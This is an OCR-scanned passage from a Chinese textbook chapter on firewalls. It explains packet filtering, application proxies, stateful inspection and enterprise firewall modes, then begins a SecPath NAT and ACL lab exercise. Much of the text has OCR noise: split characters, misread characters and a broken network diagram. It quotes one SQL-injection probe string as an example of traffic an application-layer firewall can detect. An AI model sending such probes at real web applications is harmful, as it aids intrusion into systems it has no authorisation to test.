机 和 网 络 的 发 展 ,各 种 攻击 入 侵 手 段 也 相继 出 现 ,为 了 保护 计算 机 的 安全 ,人 们 开发 出 一 
种 能 阻止 计算 机 之 间 直 接 通 信 的 技术 ,并 沿用 古代 类 似 这 个 功能 的 名 字 一 一 防火 墙 。 用 
专业 术语 来 说 ,防火 墙 是 一 种 位 于 两 个 或 多 个 网 络 间 , 实 施 网 络 之 间 访 问 控制 的 组 件 集 
合 。 对 于 普通 用 户 来 说 ,所 谓 防 火 墙 , 指 的 就 是 一 种 被 放置 在 自己 的 计算 机 与 外 界 网 络 之 
间 的 防御 系统 ,从 网 络 发 往 计算 机 的 所 有 数据 都 要 经 过 它 的 判断 处 理 后 , 才 会 决定 能 不 能 
把 这 些 数据 交 给 计算 机 ,一 旦 发 现 有 害 数据 ,防火 墙 就 会 拦截 下 来 ,从 而 实现 对 计算 机 的 
保护 功能 。 

防火 墙 技术 从 诞生 开始 ,就 在 一 刻 不 停 地 发 展 着 ,各 种 不 同 结构 不 同 功 能 的 防火 墙 ， 
构筑 成 网 络 上 的 一 道道 防御 大 堤 。 
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6.6.1 防火 墙 的 分 类 


世界 上 没有 一 种 事物 是 唯一 的 ,防火 墙 也 一 样 ,为 了 更 有 效率 地 对 付 网 络 上 各 种 不 同 
攻击 手段 ,防火 墙 也 派 分 出 几 种 防御 架构 。 根 据 物理 特性 ,防火 墙 分 为 两 大 类 ,硬件 防火 
墙 和 软件 防火 墙 。 软 件 防火 墙 是 一 种 安装 在 负责 内 外 网 络 转换 的 网 关 服务 器 或 者 独立 的 
个 人 计算 机 上 的 特殊 程序 , 它 是 以 逻辑 形式 存在 的 ,防火 墙 程序 跟随 系统 启动 ,通过 运行 
在 Ring0 级 别 的 特殊 驱动 模块 把 防御 机 制 插入 系统 关于 网 络 的 处 理 部 分 和 网 络 接口 设 
备 驱 动 之 间 ,形成 一 种 逻辑 上 的 防御 体系 。 

在 没有 软件 防火 墙 之 前 ,系统 和 网 络 接口 设备 之 间 的 通道 是 直接 连通 的 ,网 络 接口 设 
备 通 过 网 络 驱动 程序 接口 (Network Driver Interface Specification, NDIS) 把 网 络 上 传 来 
的 各 种 报 文 都 忠实 地 交 给 系统 处 理 , 例 如 一 台 计 算 机 接收 到 请 求 列 出 机 器 上 所 有 共享 资 
源 的 数据 报 文 ,NDIS 直接 把 这 个 报 文 提交 给 系统 ,系统 在 处 理 后 就 会 返回 相应 数据 ,在 
某 些 情况 下 就 会 造成 信息 泄漏 。 而 使 用 软件 防火 墙 后 ,尽管 NDIS 接收 到 的 仍然 是 原封 
不 动 的 数据 报 文 ,但 是 在 提交 到 系统 的 通道 上 多 了 一 层 防御 机 制 , 所 有 数据 报 文 都 要 经 过 
这 层 机 制 。 该 机 制 根据 一 定 的 规则 对 数据 判断 处 理 , 只 有 它 认 为 安全 的 数据 才能 到 达 系 
统 , 其 他 数据 则 被 丢弃 。 因 为 有 规则 提 到 * 列 出 共享 资源 的 行为 是 危险 的 ”, 因 此 在 防火 墙 
的 判断 下 ,这 个 报 文 会 被 丢弃 ,这 样 一 来 ,系统 接收 不 到 报 文 , 则 认为 什么 事情 也 没 发 生 
过 ,也 就 不 会 把 信息 泄漏 出 去 。 

软件 防火 墙 工作 于 系统 接口 与 NDIS 之 间 , 用 于 检查 过 滤 由 NDIS 发 送 过 来 的 数据 ， 
在 无 须 改动 硬件 的 前 提 下 便 能 实现 一 定 强度 的 安全 保障 ,但 是 由 于 软件 防火 墙 自身 属于 
运行 于 系统 上 的 程序 ,不 可 避免 地 需要 占用 一 部 分 CPU 资源 维持 工作 ,而 且 由 于 数据 判 
断 处 理 需 要 一 定 的 时 间 ,在 一 些 数据 流量 大 的 网 络 里 ,软件 防火 墙 会 使 整个 系统 工作 效率 
和 数据 春 吐 速度 下 降 ,甚至 有 些 软件 防火 墙 会 存在 漏洞 ,导致 有 害 数 据 可 以 绕 过 它 的 防御 
体系 ,给 数据 安全 带 来 损失 ,因此 ,许多 企业 并 不 会 考虑 用 软件 防火 墙 方案 作为 公司 网 络 
的 防御 措施 ,而 是 使 用 看 得 见 摸 得 着 的 硬件 防火 墙 。 

硬件 防火 墙 是 一 种 以 物理 形式 存在 的 专用 设备 ,通常 架设 于 两 个 网 络 的 驶 接 处 ,直接 
从 网 络 设备 上 检查 过 滤 有 害 的 数据 报 文 , 位 于 防火 墙 设备 后 端的 网 络 或 服务 器 接收 到 的 
是 经 过 防火 墙 处 理 的 相对 安全 的 数据 ,不 必 另 外 分 出 CPU 资源 去 进行 基于 软件 架构 的 
NDIS 数据 检测 ,可 以 大 大 提高 工作 效率 。 

硬件 防火 墙 一般 是 通过 网 线 连接 于 外 部 网 络 接口 与 内 部 服务 器 或 企业 网 络 之 间 的 设 
备 。 这 里 又 另外 派 分 出 两 种 结构 ,一 种 是 普通 硬件 级 别 防火 墙 , 它 拥有 标准 计算 机 的 硬件 
平台 和 一 些 功 能 经 过 简化 处 理 的 UNIX 系列 操作 系统 和 防火 墙 软件 ,这 种 防火 墙 措 施 相 
当 于 专门 拿 出 一 台 计 算 机 安装 了 软件 防火 墙 ,除了 不 需要 处 理 其 他 事务 以 外 , 它 毕 况 还 是 
一 般 的 操作 系统 ,因此 有 可 能 会 存在 漏洞 和 不 稳定 因素 ,安全 性 并 不 能 做 到 最 好 ; 另 一 种 
是 所 谓 的 “芯片 级 硬件 防火 墙 , 它 采 用 专门 设计 的 硬件 平台 ,在 上 面 搭建 的 软件 也 是 专门 
开发 的 ,并 非 流行 的 操作 系统 ,因而 可 以 达到 较 好 的 安全 性 能 保障 。 但 无 论 是 哪 种 硬件 防 
火 墙 ,管理 员 都 可 以 通过 计算 机 连接 上 去 设置 工作 参数 。 由 于 硬件 防火 墙 的 主要 作用 是 
把 传人 的 数据 报 文 进 行 过 滤 处 理 后 转发 到 位 于 防火 墙 后 面 的 网 络 中 ,因此 它 自身 的 硬件 
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规格 也 是 分 档次 的 ,尽管 硬件 防火 墙 已 经 足以 实现 比较 高 的 信息 处 理 效率 ,但 是 在 一 些 对 
数据 吞吐 量 要 求 很 高 的 网 络 里 ,档次 低 的 防火 墙 仍然 会 形成 瓶颈 ,所 以 对 于 一 些 大 企业 而 
言 ,芯片 级 的 硬件 防火 墙 才 是 他 们 的 首选 。 

有 人 也 许 会 这 么 想 , 既 然 PC 架构 的 防火 墙 也 不 过 如 此 ,那么 购买 这 种 防火 墙 还 不 如 
自己 找 技 术 人 员 专 门 腾 出 一 台 计 算 机 来 做 防火 墙 方案 。 虽 然 这 样 做 也 是 可 以 的 ,但 是 工 
作 效 率 并 不 能 和 真正 的 PC 架构 防火 墙 相 比 , 因 为 PC 架构 防火 墙 采 用 的 是 专门 修改 简化 
过 的 系统 和 相应 防火 墙 程序 , 比 一 般 计 算 机 系统 和 软件 防火 墙 更 高 度 紧密 结合 ,而 且 由 于 
它 的 工作 性 质 决定 它 要 具备 非常 高 的 稳定 性 .实用 性 和 非常 高 的 系统 吞吐 性 能 ,这 些 要 求 
并 不 是 安装 了 多 网 卡 的 计算 机 就 能 简单 蔡 代 的 ,因此 PC 架构 防火 墙 虽然 是 与 计算 机 差 
不 多 的 配置 ,但 价格 相差 很 大 。 

现实 中 我 们 往往 会 发 现 , 并 非 所 有 企业 都 架设 芯片 级 硬件 防火 墙 , 而 是 用 PC 架构 防 
火 墙 甚至 前 面 提 到 的 计算 机 蔡 代 方 案 支 撑 着 ,为 什么 ? 这 大 概 就 是 硬件 防火 墙 最 显著 的 
缺点 了 : 它 太 贵 了 ! 购 进 一 台 PC 架构 防火 墙 的 成 本 至 少 都 要 几 千 元 ,高 档次 的 芯片 级 防 
火 墙 方案 更 是 在 10 万 元 以 上 ,这些 价 格 并 非 是 小 企业 所 能 承受 的 ,而 且 对 于 一 般 家 庭 用 
户 而 言 ,自己 的 数据 和 系统 安全 也 无 须 专门 用 到 一 个 硬件 设备 去 保护 ,何况 为 一 台 防火 墙 
投入 的 资金 足以 让 用 户 购买 更 高 档 的 电脑 ,因而 广大 用 户 只 要 安装 一 种 好 用 的 软件 防火 
墙 就 够 了 。 

为 防火 墙 分 类 的 方法 有 很 多 ,除了 从 形式 上 把 它 分 为 软件 防火 墙 和 硬件 防火 墙 以 外 ， 
还 可 以 从 技术 上 分 为 “ 包 过 滤 型 "“ 应 用 代理 型 "和 “状态 监视 ”三 类 ;从 结构 上 又 分 为 单一 
主机 防火 墙 . 路 由 集成 式 防火 墙 和 分 布 式 防火 墙 三 种 ; 按 工 作 位 置 分 为 边界 防火 墙 、 个 人 
防火 墙 和 混合 防火 墙 ; 按 防 火 墙 性 能 分 为 百 兆 级 防火 墙 和 千 兆 级 防火 墙 两 类 …… 虽 然 看 
似 种 类 繁多 ,但 这 只 是 因为 业界 分 类 方法 不 同 黑 了 ,例如 一 台 硬 件 防 火 墙 就 可 能 由 于 结 
构 .数据 吞吐 量 和 工作 位 置 而 规划 为 " 百 兆 级 状态 监视 型 边界 防火 墙 ”, 因 此 这 里 主要 介绍 
的 是 技术 方面 的 分 类 , 即 * 包 过 滤 型 "“ 应 用 代理 型 ?和 * 状 态 监视 型 ”防火墙 技 术 。 

那么 ,那些 所 谓 的 “边界 防火 墙 "“ 单 一 主机 防火 墙 ” 又 是 什么 概念 呢 ? 所 谓 “ 边 界 ”， 
就 是 指 两 个 网 络 之 间 的 接口 处 ,工作 于 此 的 防火 墙 就 被 称 为 “边界 防火 墙 ”; 与 之 相对 的 有 
“个 人 防火 墙 ”, 它 们 通常 是 基于 软件 的 防火 墙 ,只 处 理 一 台 计 算 机 的 数据 而 不 是 整个 网 络 
的 数据 ,现在 一 般 家 庭 用 户 使 用 的 软件 防火 墙 就 是 这 个 分 类 。 而 “单一 主机 防火 墙 ” 呢 ,就 
是 我 们 最 常见 的 一 台 台 硬件 防火 墙 ;一 些 厂商 为 了 节约 成 本 ,直接 把 防火 墙 功 能 嵌 进 路 由 
设备 里 ,就 形成 了 路 由 集成 式 防火 墙 …… 


6.6.2 防火 墙 所 使 用 的 基本 技术 


传统 意义 上 的 防火 墙 技术 分 为 三 大 类 ,“ 包 过 滤 ”(Packet Filtering)“ 应 用 代理 ” 
(Application Proxy) 和 “状态 监视 ”(Stateful Inspection) ,无 论 一 个 防火 墙 的 实现 过 程 多 
么 复杂 ,归根 结 底 都 是 在 这 三 种 技术 的 基础 上 进行 功能 扩展 的 。 

1. 包 过 滤 技 术 

包 过 滤 是 最 早 使 用 的 一 种 防火 墙 技术 , 它 的 第 一 代 模 型 是 “静态 包 过 滤 ”(Static 
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Packet Filtering) ,使 用 包 过 滤 技 术 的 防火 墙 通常 工作 在 OSI 模型 中 的 网 络 层 (Network 
Layer) 上 ,后 来 发 展 更 新 的 “动态 包 过 滤 ”(Dynamic Packet Filtering) 增 加 了 传输 层 
(Transport Layer) , 简 而 言 之 , 包 过 滤 技 术 工 作 的 地 方 就 是 各 种 基于 TCP/IP 协议 的 数据 
报 文 进出 的 通道 , 它 把 这 两 层 作 为 数据 监控 的 对 象 ,对 每 个 数据 包 的 头 部 ,协议 、 地 址 、 端 
口 .类 型 等 信息 进行 分 析 , 并 与 预先 设 定好 的 防火 墙 过 滤 规 则 (Filtering Rule) 进 行 核 对 ， 
一 旦 发 现 某 个 包 的 某 个 或 多 个 部 分 与 过 滤 规 则 匹配 并 且 条 件 为 “阻止 "的 时 候 , 这 个 包 就 
会 被 丢弃 。 适 当 的 设置 过 滤 规 则 可 以 让 防火 墙 工 作 得 更 安全 有 效 , 但 是 这 种 技术 只 能 根 
据 预 设 的 过 滤 规 则 进行 判断 ,一 旦 出 现 一 个 没有 在 设计 人 员 意 料 之 中 的 有 害 数据 包 请 求 ， 
整个 防火 墙 的 保护 就 相当 于 摆设 。 也 许 你 会 想 , 让 用 户 自 行 添加 不 行 吗 ? 但 是 别 忘 了 ,我 
们 要 为 普通 计算 机 用 户 考 虑 ,并 不 是 所 有 人 都 了 解 网 络 协议 ,如 果 防 火 墙 工 具 出 现 过 滤 遗 
漏 问题 ,他 们 只 能 等 着 被 人 侵 。 一 些 公司 采用 定期 从 网 络 升级 过 滤 规 则 的 方法 ,这 个 创意 
固然 可 以 方便 一 部 分 家 庭 用 户 , 但 是 对 相对 比较 专业 的 用 户 而 言 , 却 不 见得 就 是 好 事 , 因 
为 他 们 可 能 会 有 根据 自己 的 机 器 环境 设 定 和 改动 的 规则 ,如 果 这 个 规则 刚好 和 升级 到 的 
规则 发 生 冲 突 ,用户 就 该 郁 间 了, 而且 如 果 两 条 规则 冲突 了 ,防火 墙 该 听 谁 的 ,会 不 会 当场 
“ 死 给 你 看 ”( 骨 省 )? 也 许 就 因为 考虑 到 这 些 因素 ,至 今 没 见 过 有 多 少 个 产品 会 提供 过 滤 
规则 更 新 功能 的 ,这 并 不 能 和 杀毒 软件 的 病毒 特征 库 升 级 原理 相提并论 。 为 了 解决 这 种 
鱼 与 能 掌 的 问题 ,人 们 对 包 过 滤 技 术 进 行 改进 ,这 种 改进 后 的 技术 称 为 “动态 包 过 滤 ”( 市 
场 上 存在 一 种 “基于 状态 的 包 过 滤 防 火 墙 ” 技 术 , 即 Stateful-based Packet Filtering. t fi] 
其 实 是 同一 类 型 ) ,与 它 的 前 辈 相 比 ,动态 包 过 滤 功 能 在 保持 着 原 有 静态 包 过 滤 技 术 和 过 
滤 规 则 的 基础 上 ,会 对 已 经 成 功 与 计算 机 连接 的 报 文 传输 进行 跟踪 ,并 且 判断 该 连接 发 送 
的 数据 包 是 否 会 对 系统 构成 威胁 ,一 旦 触发 其 判断 机 制 , 防 火 墙 就 会 自动 产生 新 的 临时 过 
滤 规 则 或 者 把 已 经 存在 的 过 滤 规 则 进行 修改 ,从 而 阻止 该 有 害 数据 的 继续 传输 ,但 是 由 于 
动态 包 过 滤 需 要 消耗 额外 的 资源 和 时 间 来 提取 数据 包 对 内 容 进 行 判断 处 理 , 所 以 与 静态 
包 过 滤 相 比 , 它 会 降低 运行 效率 ,但 是 静态 包 过 滤 几 乎 已 经 退出 市 场 ,我 们 能 选择 的 ,大 部 
分 也 只 有 动态 包 过 滤 防 火 墙 。 

基于 包 过 滤 技 术 的 防火 墙 ,其 缺点 是 很 显著 的 : 它 得 以 进行 正常 工作 的 一 切 依据 都 
在 于 过 滤 规 则 的 实施 ,但 是 偏 又 不 能 满足 建立 精细 规则 的 要 求 (规则 数量 和 防火 墙 性 能 成 
反比 ) ,而 且 它 只 能 工作 于 网 络 层 和 传输 层 , 并 不 能 判断 高 级 协议 里 的 数据 是 否 有 害 ,但 是 
由 于 它 廉 价 ,容易 实现 ,所 以 它 依然 服役 在 各 种 领域 ,在 技术 人 员 频 繁 的 设置 下 为 我 们 工 
作 着 。 

2. 应 用 代理 技术 

由 于 包 过 滤 技 术 无 法 提供 完善 的 数据 保护 措施 ,而 且 一 些 特殊 的 报 文 攻击 仅仅 使 用 
过 滤 的 方法 并 不 能 消除 危害 (如 SYN 攻击 ICMP 洪水 等 ) ,因此 人 们 需要 一 种 更 全 面 的 
防火 墙 保护 技术 ,在 这 样 的 需求 背景 下 .采用 “应 用 代理 ”(Application Proxy) 技 术 的 防火 
墙 诞生 了 。 我 们 的 读者 还 记得 “代理 ”的 概念 吗 ? 代理 服务 器 作为 一 个 为 用 户 保密 或 者 突 
破 访问 限制 的 数据 转发 通道 ,在 网 络 上 应 用 广泛 。 我 们 都 知道 ,一 个 完整 的 代理 设备 包含 
一 个 服务 端 和 一 个 客户 端 ,服务 端 接 收 来 自用 户 的 请 求 , 调 用 自身 的 客户 端 模拟 一 个 基于 
户 请 求 连接 到 目标 服务 器 ,再 把 目标 服务 器 返回 的 数据 转发 给 用 户 ,完成 一 次 代理 工作 
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过 程 。 那 么 ,如 果 在 一 台 代理 设备 的 服务 端 和 客户 端 之 间 连 接 一 个 过 滤 措 施 呢 ? 这 样 的 
思想 便 造 就 了 “应 用 代理 ”防火 墙 .这 种 防火 墙 实际 上 就 是 一 台 小 型 的 带 有 数据 检测 过 滤 
功能 的 透明 代理 服务 器 (Transparent Proxy) ,但 是 它 并 不 是 在 一 个 代理 设备 中 单纯 地 内 
入 包 过 滤 技 术 , 而 是 一 种 被 称 为 “应 用 协议 分 析 ”(Application Protocol Analysis) 的 新 
技术 。 

“应 用 协议 分 析 ” 技 术 工 作 在 OSI 模型 的 最 高 层 应 用 层 上 ,在 这 一 层 里 能 接触 到 
的 所 有 数据 都 是 最 终 形式 ,也 就 是 说 ,防火 墙 “看 到 ”的 数据 和 我 们 看 到 的 是 一 样 的 ,而 不 
是 一 个 个 带 着 地 址 端口 协议 等 原始 内 容 的 数据 包 , 因 而 它 可 以 实现 更 高 级 的 数据 检测 过 
程 。 整 个 代理 防火 墙 把 自身 映射 为 一 条 透明 线路 ,在 用 户 方面 和 外 界线 路 看 来 ,它们 之 间 
的 连接 并 没有 任何 阻碍 ,但 是 这 个 连接 的 数据 收发 实际 上 是 经 过 代理 防火 墙 转向 的 , 当 外 
界 数据 进入 代理 防火 墙 的 客户 端 时 ,“ 应 用 协议 分 析 ” 模 块 便 根据 应 用 层 协 议 处 理 这 个 数 
据 ,通过 预 置 的 处 理 规则 ( 没 错 ,又 是 规则 ,防火 墙 离 不 开 规则 ) 查 询 这 个 数据 是 否 带 有 和 危 
害 , 由 于 这 一 层面 查询 的 已 经 不 再 是 组 合 有 限 的 报 文 协 议 , 甚 至 可 以 识别 类 似 于 “GET/ 
sql. asp? id—1 and 1” 的 数据 内 容 , 所 以 防火 墙 不 仅 能 根据 数据 层 提供 的 信息 判断 数据 ， 
更 能 像 管 理 员 分 析 服 务 器 日 志 那 样 “ 看 ”内 容 辨 危害。 而 且 由 于 工作 在 应 用 层 , 防 火 墙 还 
可 以 实现 双向 限制 ,在 过 滤 外 部 网 络 有 害 数据 的 同时 也 监控 着 内 部 网 络 的 信息 ,管理 员 可 
以 配置 防火 墙 实现 一 个 身份 验证 和 连接 时 限 的 功能 ,进一步 防止 内 部 网 络 信 息 泄漏 的 隐 
患 。 最 后 ,由 于 代理 防火 墙 采取 代理 机 制 进行 工作 ,内 外 部 网 络 之 间 的 通信 都 需 先 经 过 代 
理 服务 器 审核 ,通过 后 再 由 代理 服务 器 连接 ,根本 没有 给 分 隔 在 内 外 部 网 络 两 边 的 计算 机 
直接 会 话 的 机 会 ,可 以 避免 人 侵 者 使 用 "数据 驱动 ”攻击 方式 (一 种 能 通过 包 过 滤 技 术 防火 
墙 规则 的 数据 报 文 ,但 是 当 它 进入 计算 机 处 理 后 , 却 变 成 能 够 修改 系统 设置 和 用 户 数据 的 
恶意 代码 ) 渗 透 内 部 网 络 ,可 以 说 “应 用 代理 ?是 比 包 过 滤 技 术 更 完善 的 防火 墙 技 术 。 

但 是 ,似乎 任何 东西 都 不 可 能 逃避 * 墨 菲 定律 ”的 规则 ,代理 型 防火 墙 的 结构 特征 也 正 
是 它 的 最 大 缺点 ,由 于 它 是 基于 代理 技术 的 ,通过 防火 墙 的 每 个 连接 都 必须 建立 在 为 之 创 
建 的 代理 程序 进程 上 ,而 代理 进程 自身 是 要 消耗 一 定时 间 的 ,更 何况 代理 进程 里 还 有 一 套 
复杂 的 协议 分 析 机 制 同时 在 工作 ,于 是 数据 在 通过 代理 防火 墙 时 就 不 可 避免 地 发 生 数据 
迟滞 现象 ,换个 形象 的 说 法 ,每 个 数据 连接 在 经 过 代理 防火 墙 时 都 会 先 被 请 进 保安 室 “ 喝 
杯 茶 搜 搜 身 再 继续 赶路 ,而 保安 的 工作 速度 并 不 能 很 快 。 代 理 防 火 墙 是 以 牺牲 速度 为 代 
价 换取 比 包 过 滤 防 火 墙 更 高 的 安全 性 能 ,在 网 络 春 吐 量 不 是 很 大 的 情况 下 ,也 许 用 户 不 会 
察觉 到 什么 ,然而 到 了 数据 交换 频繁 的 时 刻 , 代 理 防 火 墙 就 成 了 整个 网 络 的 瓶颈 ,而 且 一 
旦 防火 墙 的 硬件 配置 支撑 不 住 高 强度 的 数据 流量 而 发 生 罢 工 , 整 个 网 络 可 能 就 会 因此 次 
痪 。 所 以 ,代理 防火 墙 的 普及 范围 还 远 远 不 及 包 过 滤 型 防火 墙 ,而 在 软件 防火 墙 方面 更 是 
几乎 没 见 过 类 似 产品 单机 并 不 具备 代理 技术 所 需 的 条 件 , 所 以 就 目前 整个 庞大 的 软 
件 防 火 墙 市 场 来 说 ,代理 防火 墙 很 难 有 立足 之 地 。 

3. 状态 监视 技术 

这 是 继 “ 包 过 滤 ” 技 术 和 “应 用 代理 ”技术 后 发 展 的 防火 墙 技术 , 它 是 CheckPoint 技术 
公司 在 基于 “ 包 过 滤 ” 原 理 的 “动态 包 过 滤 ” 技 术 发 展 而 来 的 ,与 之 类 似 的 有 其 他 厂商 联合 
发 展 的 “深度 包 检 测 ”(Deep Packet Inspection) 技 术 。 这 种 防火 墙 技术 通过 一 种 被 称 为 
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“状态 监视 ”的 模块 ,在 不 影响 网 络 安全 正常 工作 的 前 提 下 采用 抽取 相关 数据 的 方法 对 网 
络 通信 的 各 个 层次 实行 监测 ,并 根据 各 种 过 滤 规则 做 出 安全 决策 。 

“状态 监视 ”(Stateful Inspection) 技 术 在 保留 对 每 个 数据 包 的 头 部 .协议 ` 地 址 、 端 
口 .类 型 等 信息 进行 分 析 的 基础 上 ,进一步 发 展 " 会 话 过 滤 ”(Session Filtering) 功 能 ,在 每 
个 连接 建立 时 ,防火 墙 会 为 这 个 连接 构造 一 个 会 话 状态 ,里 面包 含 这 个 连接 数据 包 的 所 有 
信息 ,以 后 这 个 连接 都 基于 这 个 状态 信息 进行 ,这 种 检测 的 高 明之 处 是 能 对 每 个 数据 包 的 
内 容 进 行 监视 ,一旦 建立 一 个 会 话 状态 , 则 此 后 的 数据 传输 都 要 以 此 会 话 状态 作为 依据 ， 
例如 一 个 连接 的 数据 包 源 端口 是 8000, 那 么 在 以 后 的 数据 传输 过 程 里 防火 墙 都 会 审核 这 
个 包 的 源 端 口 还 是 不 是 8000 ,否则 这 个 数据 包 就 被 拦截 ,而 且 会 话 状态 的 保留 是 有 时 间 
限制 的 ,在 超时 的 范围 内 如 果 没 有 再 进行 数据 传输 ,这 个 会 话 状 态 就 会 被 丢弃 。 状 态 监 视 
可 以 对 包 内 容 进 行 分 析 , 从 而 摆脱 了 传统 防火 墙 仅 局 限于 几 个 包头 部 信息 的 检测 弱点 ,而 
且 这 种 防火 墙 不 必 开 放 过 多 端口 ,进一步 杜绝 可 能 因为 开放 端口 过 多 而 带 来 的 安全 隐患 。 

由 于 状态 监视 技术 相当 于 结合 了 包 过 滤 技 术 和 应 用 代理 技术 ,因此 是 最 先进 的 ,但 是 
由 于 实现 技术 复杂 ,在 实际 应 用 中 还 不 能 做 到 真正 的 、 完 全 有 效 的 数据 安全 检测 ,而 且 在 
一 般 的 计算 机 硬件 系统 上 很 难 设计 出 基于 此 技术 的 完善 防御 措施 (市 面 上 大 部 分 软件 防 
火 墙 使 用 的 其 实 只 是 包 过 滤 技 术 加 上 一 点 其 他 新 特性 而 已 ) 。 

通常 来 说 企业 级 的 防火 墙 有 以 下 三 种 工作 模式 : 路 由 模式 、 透 明 模式 以 及 混合 模式 。 
在 透明 模式 下 ,防火 墙 的 所 有 接口 均 作 为 交换 接口 工作 。 路 由 模式 下 ,防火墙 类 似 于 一 台 
路 由 器 转发 数据 包 ,将 接收 到 的 数据 包 的 目标 MAC 地 址 蔡 换 为 相应 接口 的 MAC 地址， 
然后 转发 。 该 模式 适用 于 防火 墙 的 每 个 区 域 都 不 在 同一 个 网 段 的 情况 , 某 些 区 域 工作 在 
透明 模式 下 ,其 余 区 域 工作 在 路 由 模式 下 。 


6.6.3 ”技术 展望 


防火 墙 作为 维护 网 络 安全 的 关键 设备 ,在 目前 采用 的 网 络 安全 的 防范 体系 中 ,占据 着 
举足轻重 的 位 置 。 伴 随 计算 机 技术 的 发 展 和 网 络 应 用 的 普及 , 越 来 越 多 的 企业 与 个 体 都 
遭遇 到 不 同 程度 的 安全 难题 。 因 此 市 场 对 防火 墙 的 设备 需求 和 技术 要 求 都 在 不 断 提 升 ， 
而 且 越 来 越 严峻 的 网 络 安全 问题 也 要 求 防火 墙 技术 有 更 快 的 提高 速度 ,否则 将 会 在 面 对 
新 一 轮 入 侵 手 法 时 束手无策 。 

多 功能 ,高 安全 性 的 防火 墙 可 以 让 用 户 网 络 更 加 无 优 , 但 前 提 是 要 确保 网 络 的 运行 效 
率 。 在 防火 墙 发 展 过 程 中 ,必须 始终 将 高 性 能 放 在 主要 位 置 ,目前 各 大 厂商 正在 朝 这 个 方 
向 努力 。 而 且 丰 富 的 产品 功能 也 是 用 户 选择 防火 墙 的 依据 之 一 ,一 款 完 善 的 防火 墙 产品 ， 
应 该 包含 有 访问 控制 .网 络 地 址 转换 .代理 .认证 和 日 志 审 计 等 基础 功能 ,并 拥有 自己 特色 
的 安全 相关 技术 ,如 规则 简化 方案 等 。 明 天 的 防火 墙 技术 将 会 如 何 发 展 , 让 我 们 拭 目 
以 待 。 


6.6.4 实践 案例 6-4: 防火 墙 基本 配置 实验 
通过 本 实验 初步 掌握 防火 墙 的 基本 配置 方法 和 操作 技能 ,掌握 组 建 较 大 规模 企业 网 
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时 防火 墙 策略 的 配置 及 应 用 的 几 个 方面 : 掌握 防火 墙 的 配置 方法 ;掌握 访问 控制 列表 
(ACL) 的 基本 配置 ;掌握 过 滤 规 则 的 配置 。 

实验 前 学 生 应 预习 并 了 解 防 火 墙 的 工作 原理 、 防 火 墙 的 安装 和 配置 及 防火 墙 的 应 用 

实验 过 程 中 ,部 分 实验 内 容 需 要 与 相 邻 的 同学 配合 完成 。 此 外 ,学 生 需 要 将 实验 的 结 
果 记 录 下 来 ,并 回答 相关 思考 题 ,填写 到 实验 报告 中 。 

本 实验 类 型 是 综合 型 实验 。 

实验 设备 由 华为 -3Com 交换 机 S3100H 六 台 和 华为 -3Com 防火 墙 Secpath F100-C 
六 台 组 成 。 

其 中 每 排 PC 为 一 组 ,占用 一 台 S3100H 交换 机 ,其 中 S3100H 交换 机 划分 两 个 
VLAN, 每 个 VLAN 只 加 入 三 台 PC,S3100H 交换 机 的 另外 两 个 端口 ,分别 连接 防火 墙 的 
LAN 口 和 WAN 口 。 

以 下 实验 内 容 可 根据 实验 室 的 具体 情况 和 课时 安排 的 变化 进行 适当 的 调整 ,实验 内 
容 中 的 思考 题 以 书面 形式 解答 并 附 在 实验 报告 的 后 面 。 

本 次 实验 的 主要 项 目 包 括 以 下 几 个 方面 : 

(1) 分 组 配置 防火 墙 ,使 LAN 中 的 PC 通过 防火 墙 提供 的 NAT 访问 外 网 ,然后 测试 
LAN 中 的 PC 和 WAN 中 的 PC 之 间 的 连通 性 ; 

(2) 配置 防火 墙 ,使 VAN 中 的 PC 只 能 够 通过 80 端口 访问 LAN 中 的 Web 服务 器 ， 
且 不 能 在 外 网 中 扫描 到 内 网 中 的 计算 机 ,配置 完成 之 后 ,测试 配置 效果 。 

需要 注意 的 是 ,学 生 在 实验 过 程 中 要 严格 按 实验 指导 书 的 操作 步骤 和 要 求 操作 , 且 小 
组 成 员 应 紧密 配合 ,以 保证 实验 过 程 能 够 顺利 完成 。 具 体 的 实验 步骤 如 下 。 

1. 实验 准备 

进行 网 络 初始 化 配置 ,这 一 部 分 操作 由 指导 教师 和 实验 员 预 先进 行 设 置 。 

CD 将 S3100H 交换 机 划分 两 个 VLAN(VLAN 2 fll VLAN 3), 其 中 VLAN 2 连接 
到 防火 墙 的 LAN 口 ,VLAN 3 连接 到 防火 墙 的 WAN 口 。 

(2) 配置 防火 墙 的 管理 地 址 ,配置 为 192. 168. 1. 254。 

2. 防火 墙 的 基本 配置 

首先 ,每 个 实验 小 组 分 别 按照 表 6. 2 配置 各 个 PC 的 IP 地 址 ,每 排 只 会 用 到 六 台 计 
算 机 ,每 排 两 台 计 算 机 网 线 用 于 防火 墙 的 WAN 和 LAN 口 , 具 体 的 IP 地 址 分 配 情况 参见 
图 6.21 和 表 6.2, 


表 6.2 防火 墙 IP 地 址 表 


防火 墙 管理 IP 防火 墙 管理 IP 
1 10.0. 1.251 4 10. 0. 4. 251 
2 10.0. 2. 251 5 10.0. 5. 251 


3 10.0.3.251 6 10. 0. 6. 251 
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202.206.197.181 
A 


Web 服 务 器 
202.206.197.184 


外 网 用 户 
202.206.197.180 


I 
1 
1 
1 
1 
1 
1 
1 
1 
1 
V 


Internet 


Intranet 


内 网 用 户 Web 服 务 器 
10.0.1.11 10.01.11 


图 6.21 实验 网 络 结构 图 


D 命令 行 配置 示例 
示例 案例 如 图 6. 22 所 示 ,一 个 公司 通过 SecPath 防火 墙 的 地 址 转换 功能 连接 到 广 域 
网 。 要 求 该 公司 能 够 通过 防火 墙 Ethernet3/0/0 访问 Internet. 公司 内 部 对 外 提供 
WWW.,FTP 和 SMTP 服务 ,而 且 提 供 两 台 WWW 的 服务 器 。 公 司 内 部 网 址 为 10. 110. 
0.0/16。 
10.110.10.1 10.110.10.2 10.110.10.3 10.110.10.4 
Hc Bc Roc Rc 
FTP 服 务 器 WWW 服 务 器 ! WWW 服 务 器 2 SMTP 服 务 器 


10.110.10.100 公司 内 部 以 太 网 10.110.12.100 


E = 


内 部 PC 内 部 PC 


Ethernet3/0/0 


外 部 PC 
6.22 示例 案例 


其 中 ,内 部 FTP 服务 器 地 址 为 10. 110. 10.1, 内 部 WWW 服务 器 1 地 址 为 10. 110. 
10.2, 内 部 WWW 服务 器 2 地 址 为 10. 110. 10. 3, 内 部 SMTP 服务 器 地 址 为 10. 110. 10. 
4, 并 且 和 希望 可 以 对 外 提供 统一 的 服务 器 的 IP 地 址 。 内 部 10. 110. 10. 0/24 网 段 可 以 访问 
